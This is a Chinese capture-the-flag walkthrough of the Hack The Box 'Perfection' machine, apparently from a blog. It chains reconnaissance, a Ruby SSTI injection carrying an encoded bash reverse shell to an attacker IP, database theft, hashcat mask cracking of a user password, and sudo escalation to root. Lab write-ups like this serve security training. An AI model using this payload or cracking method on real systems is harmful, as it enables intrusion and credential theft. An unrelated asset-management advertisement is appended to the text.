Hack The Box-Perfection

总体思路

端口扫描->SSTI RCE->db文件泄露->hashcat破解密码

信息收集&端口利用

nmap -sV -sC -A 10.10.11.253

在这里插入图片描述

目标只开放了22和80端口,先进行目录扫描和子域名探测

dirsearch -u 10.10.11.253
ffuf -c -u http://pefection.htb/ -H "Host: FUZZ.perfection.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

在这里插入图片描述

在这里插入图片描述

没有有价值的信息,回到80端口上

SSTI RCE利用

在这里插入图片描述

来到界面,是一个成绩计算器,先随意填写数值查看效果

在这里插入图片描述

在这里插入图片描述

提交数据时候抓包,放入一段反弹shell的代码

#源代码为
<% system("echo 
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/9000 0>&1 | base64 -d | bash"); 
%>;
#经过url编码和base64编码后为
category1=1%0A;<%25+system("echo+IyEvYmluL2Jhc2gKYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDAgMD4mMQ==+|+base64+-d|+bash");+%25>;

在这里插入图片描述

在这里插入图片描述

db文件泄露

查找当前用户有什么敏感信息

在这里插入图片描述

在Migration文件夹下有一个db数据库文件,将其下载到本地查看

在这里插入图片描述

Hashcat破解密码

有若干个用户名以及密码,将他们放入john查看是否能够破解

在这里插入图片描述

破解失败,可能是加密方式不对,继续查找敏感信息,发现在/var/spool/mail中有一段关于密码的提示

在这里插入图片描述

大概意思就是需要用户自己重置密码,重置的格式为{名字_名字的逆序_在(1,1000000000)之间的一个随机数},尝试使用hashcat的掩码爆破功能破解

hashcat -m 1400 -a 3 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f susan_nasus_?d?d?d?d?d?d?d?d?d

其中-a指定破解模式,3为指定掩码破解,后面跟的第一个参数为密文,第二个参数为要爆破的数值

在这里插入图片描述

可以看到,爆破出来的密码为:susan_nasus_413759210,使用susan/susan_nasus_413759210登录到主机

ssh susan@10.10.11.253

在这里插入图片描述

查看当前用户能够执行的权限

在这里插入图片描述

发现该用户能够执行所有的sudo命令,使用sudo提权到root用户

sudo su root

在这里插入图片描述

提权成功

完美固定资产管理系统是一个集固定资产管理、跟踪和监控于一体的综合性系统。该系统具有以下特点和功能: 1. 完整的资产信息管理:系统可以对企业的固定资产进行全面的信息管理,包括资产编号、名称、规格、数量、购买日期、购买费用等。同时,系统还可以将这些信息与其他关键信息(如供应商、保修期限等)关联起来,方便企业进行更全面和准确的资产管理。 2. 高效的资产跟踪和监控:系统通过采用条码、RFID等先进的技术手段,能够对固定资产进行精确的跟踪和监控。企业可以实时了解资产的位置、状态和使用情况,减少资产丢失和滥用的风险。同时,系统还可以设置提醒功能,及时通知企业对到期保修或维护的资产进行处理,提高资产的利用率和寿命。 3. 系统化的维护和维修管理:完美固定资产管理系统会对企业的维修和保养工作进行系统化管理。系统可以根据资产的维护要求、保养规程和维修记录进行自动化的提醒和安排。同时,系统还可以生成维修工单和相关报表,提供数据支持和决策依据,提高企业的维修效率和质量。 4. 准确的财务管理和分析支持:系统能够进行准确的资产减值核算、折旧计算和财务分析,帮助企业做好资产财务管理工作。系统还可以生成相关的报表和图表,提供对资产投资和利用情况的全面分析和评估,为企业的决策提供参考。 总之,完美固定资产管理系统通过集中管理和综合控制,提高了企业对固定资产的管理效率和质量,帮助企业降低了成本、提高了资产价值和使用寿命,为企业的可持续发展提供有力支持。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值